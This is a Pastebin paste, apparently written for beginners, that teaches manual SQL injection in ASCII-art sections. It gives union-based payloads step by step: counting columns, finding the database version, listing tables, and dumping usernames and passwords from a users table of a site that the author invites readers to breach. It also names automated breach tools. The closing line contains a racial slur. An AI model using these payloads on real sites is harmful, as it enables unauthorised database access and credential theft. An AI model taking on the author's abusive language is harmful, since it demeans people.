Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ██╗ ██╗ ██████╗ ██╗ ██╗
- ██║ ██║██╔═══██╗██║ ██║
- ███████║██║ ██║██║ █╗ ██║
- ██╔══██║██║ ██║██║███╗██║
- ██║ ██║╚██████╔╝╚███╔███╔╝
- ╚═╝ ╚═╝ ╚═════╝ ╚══╝╚══╝
- ████████╗ ██████╗
- ╚══██╔══╝██╔═══██╗
- ██║ ██║ ██║
- ██║ ██║ ██║
- ██║ ╚██████╔╝
- ╚═╝ ╚═════╝
- ███╗ ███╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ██╗
- ████╗ ████║██╔══██╗████╗ ██║██║ ██║██╔══██╗██║
- ██╔████╔██║███████║██╔██╗ ██║██║ ██║███████║██║
- ██║╚██╔╝██║██╔══██║██║╚██╗██║██║ ██║██╔══██║██║
- ██║ ╚═╝ ██║██║ ██║██║ ╚████║╚██████╔╝██║ ██║███████╗
- ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝
- ███████╗ ██████╗ ██╗ ██╗███╗ ██╗ ██╗███████╗ ██████╗████████╗
- ██╔════╝██╔═══██╗██║ ██║████╗ ██║ ██║██╔════╝██╔════╝╚══██╔══╝
- ███████╗██║ ██║██║ ██║██╔██╗ ██║ ██║█████╗ ██║ ██║
- ╚════██║██║▄▄ ██║██║ ██║██║╚██╗██║██ ██║██╔══╝ ██║ ██║
- ███████║╚██████╔╝███████╗ ██║██║ ╚████║╚█████╔╝███████╗╚██████╗ ██║
- ╚══════╝ ╚══▀▀═╝ ╚══════╝ ╚═╝╚═╝ ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝
- .---------------------------_______
- /''''''''''(______O] ----------____ \______/]_
- __...---'"""\_ --'' / FUCK ISIS ___________@ - - - - - - - (manual sql injecting)
- |''' ._ _______________----------"""""""
- | ..--''| | ) |_| |
- | ..--'' . /-___| ' '
- | ..--'' / , ' '
- |--'' / , ` \
- |__' \ -
- - '-.
- '. /
- '-./
- ██████████████████████████████████████████████████
- ╔═╗┬─┐┌─┐┌┬┐┬┌┬┐┌─┐
- ║ ├┬┘├┤ │││ │ └─┐
- ╚═╝┴└─└─┘─┴┘┴ ┴ └─┘
- http://twitter.com/urbackdoored
- ██████████████████████████████████████████████████
- ╔╦╗┌─┐┌┐ ┬ ┌─┐ ┌─┐┌─┐ ╔═╗┌─┐┌┐┌┌┬┐┌─┐┌┐┌┌┬┐┌─┐
- ║ ├─┤├┴┐│ ├┤ │ │├┤ ║ │ ││││ │ ├┤ │││ │ └─┐
- ╩ ┴ ┴└─┘┴─┘└─┘ └─┘└ ╚═╝└─┘┘└┘ ┴ └─┘┘└┘ ┴ └─┘
- 1.) [Finding SQL Injectable sites]
- 2.) [Retrieving columns]
- 3.) [Retrieving vulnerable columns]
- 4.) [Checking for the type of MySQL version]
- 5.) [Retrieving table names]
- 7.) [Retrieving data from columns]
- 8.) [Automatically SQL injecting]
- ██████████████████████████████████████████████████
- ╔═╗┬┌┐┌┌┬┐┬┌┐┌┌─┐ ╔═╗╔═╗ ╦ ┬┌┐┌ ┬┌─┐┌─┐┌┬┐┌─┐┌┐ ┬ ┌─┐
- ╠╣ ││││ │││││││ ┬ ╚═╗║═╬╗║ ││││ │├┤ │ │ ├─┤├┴┐│ ├┤
- ╚ ┴┘└┘─┴┘┴┘└┘└─┘ ╚═╝╚═╝╚╩═╝ ┴┘└┘└┘└─┘└─┘ ┴ ┴ ┴└─┘┴─┘└─┘
- ┌─┐┬┌┬┐┌─┐┌─┐
- └─┐│ │ ├┤ └─┐
- └─┘┴ ┴ └─┘└─┘
- Please i god forbid using "google dorks" for a beginner its even bad!
- There are plenty of SQL injection scanners developed in C, C++, C#, perl,
- python, java, & php. using google dorks at this point should not be your
- course.
- ██████████████████████████████████████████████████
- ┬─┐┌─┐┌┬┐┬─┐┬┌─┐┬ ┬┬┌┐┌┌─┐ ┌─┐┌─┐┬ ┬ ┬┌┬┐┌┐┌┌─┐
- ├┬┘├┤ │ ├┬┘│├┤ └┐┌┘│││││ ┬ │ │ ││ │ │││││││└─┐
- ┴└─└─┘ ┴ ┴└─┴└─┘ └┘ ┴┘└┘└─┘ └─┘└─┘┴─┘└─┘┴ ┴┘└┘└─┘
- Your payload will be; +order+by+(number)--
- Note; your "number" can be changed from 1-15 wait until it shows an error.
- It will look like; http://fuckfbi.gov/hacked.php?id=420+order+by+(1)--
- ██████████████████████████████████████████████████
- ┬─┐┌─┐┌┬┐┬─┐┬┌─┐┬ ┬┬┌┐┌┌─┐ ┬ ┬┬ ┬┬ ┌┐┌┌─┐┬─┐┌─┐┌┐ ┬ ┌─┐
- ├┬┘├┤ │ ├┬┘│├┤ └┐┌┘│││││ ┬ └┐┌┘│ ││ │││├┤ ├┬┘├─┤├┴┐│ ├┤
- ┴└─└─┘ ┴ ┴└─┴└─┘ └┘ ┴┘└┘└─┘ └┘ └─┘┴─┘┘└┘└─┘┴└─┴ ┴└─┘┴─┘└─┘
- ┌─┐┌─┐┬ ┬ ┬┌┬┐┌┐┌┌─┐
- │ │ ││ │ │││││││└─┐
- └─┘└─┘┴─┘└─┘┴ ┴┘└┘└─┘
- Your payload; +union+select+1,2,3,4--
- Note; 1,2,3,4 should be change the the column your found with the payload "+order+by+(number)--"
- Note; in the "id=420" in your link you will need to change the numbers to "null"
- It will look like; http://fuckfbi.gov/hacked.php?id=null+union+select+1,2,3,4--
- ██████████████████████████████████████████████████
- ┌─┐┬ ┬┌─┐┌─┐┬┌─┬┌┐┌┌─┐ ┌─┐┌─┐┬─┐ ╔╦╗┬ ┬╔═╗╔═╗ ╦
- │ ├─┤├┤ │ ├┴┐│││││ ┬ ├┤ │ │├┬┘ ║║║└┬┘╚═╗║═╬╗║
- └─┘┴ ┴└─┘└─┘┴ ┴┴┘└┘└─┘ └ └─┘┴└─ ╩ ╩ ┴ ╚═╝╚═╝╚╩═╝
- ┬ ┬┌─┐┬─┐┌─┐┬┌─┐┌┐┌
- └┐┌┘├┤ ├┬┘└─┐││ ││││
- └┘ └─┘┴└─└─┘┴└─┘┘└┘
- Your payload; @@version--
- Note; you will need the link you was just trying to retrieve the vulnerable columns
- It will look like; http://fuckfbi.gov/hacked.php?id=null+union+select+1,2,3,@@version--
- Note; Replace the vulnerable column number with our payload
- ██████████████████████████████████████████████████
- ┬─┐┌─┐┌┬┐┬─┐┬┌─┐┬ ┬┬┌┐┌┌─┐ ┌┬┐┌─┐┌┐ ┬ ┌─┐
- ├┬┘├┤ │ ├┬┘│├┤ └┐┌┘│││││ ┬ │ ├─┤├┴┐│ ├┤
- ┴└─└─┘ ┴ ┴└─┴└─┘ └┘ ┴┘└┘└─┘ ┴ ┴ ┴└─┘┴─┘└─┘
- ┌┐┌┌─┐┌┬┐┌─┐┌─┐
- │││├─┤│││├┤ └─┐
- ┘└┘┴ ┴┴ ┴└─┘└─┘
- Your payload; group_concat(table_name,0x0a)+from+informati?on_schema.tables+where+table_schema=database()--
- Note; you will need the link from checking for mysql version
- It will look like; http://fuckfbi.gov/hacked.php?id=null+union+select+1,2,3,group_concat(table_name,0x0a)+from+informati?on_schema.tables+where+table_schema=database()--
- Note; replace the "@@version--" payload with ours
- ██████████████████████████████████████████████████
- ╦═╗┌─┐┌┬┐┬─┐┬┌─┐┬ ┬┬┌┐┌┌─┐ ┌┬┐┌─┐┌┬┐┌─┐
- ╠╦╝├┤ │ ├┬┘│├┤ └┐┌┘│││││ ┬ ││├─┤ │ ├─┤
- ╩╚═└─┘ ┴ ┴└─┴└─┘ └┘ ┴┘└┘└─┘ ─┴┘┴ ┴ ┴ ┴ ┴
- ┌─┐┬─┐┌─┐┌┬┐ ┌─┐┌─┐┬ ┬ ┬┌┬┐┌┐┌┌─┐
- ├┤ ├┬┘│ ││││ │ │ ││ │ │││││││└─┐
- └ ┴└─└─┘┴ ┴ └─┘└─┘┴─┘└─┘┴ ┴┘└┘└─┘
- Your payload; 1,group_concat(ID,0x3a,username,0x3a,password,0x0??a),3,4,5,6,7,8,9,10,11,12,13+from+users--
- Note; "users" will need to be changed to the database with juicy information you want. and it will display it on the webpage.
- It will look like; null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0??a),3,4,5,6,7,8,9,10,11,12,13+from+users--
- Note; At this point you should have learned manual sql injecting, It's the easiest method of a tutorial a could make.
- ██████████████████████████████████████████████████
- ╔═╗┬ ┬┌┬┐┌─┐┌┬┐┌─┐┌┬┐┬┌─┐┌─┐┬ ┬ ┬ ┬ ╔═╗╔═╗ ╦
- ╠═╣│ │ │ │ ││││├─┤ │ ││ ├─┤│ │ └┬┘ ╚═╗║═╬╗║
- ╩ ╩└─┘ ┴ └─┘┴ ┴┴ ┴ ┴ ┴└─┘┴ ┴┴─┘┴─┘┴ ╚═╝╚═╝╚╩═╝
- ┬┌┐┌ ┬┌─┐┌─┐┌┬┐┬┌┐┌┌─┐
- ││││ │├┤ │ │ │││││ ┬
- ┴┘└┘└┘└─┘└─┘ ┴ ┴┘└┘└─┘
- There are programs such as SQLMAP, Havij, SQLNinja, & DBDROP that will automatically breach the database for you.
- But learning the original way is always best for knowledge of what's happening.
- If you're that nigger whom is a leach & a skid you can go on & use it automatically but when someone asks about your
- knowledge on it don't come back to my tutorial LOL. -Chris Poole
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement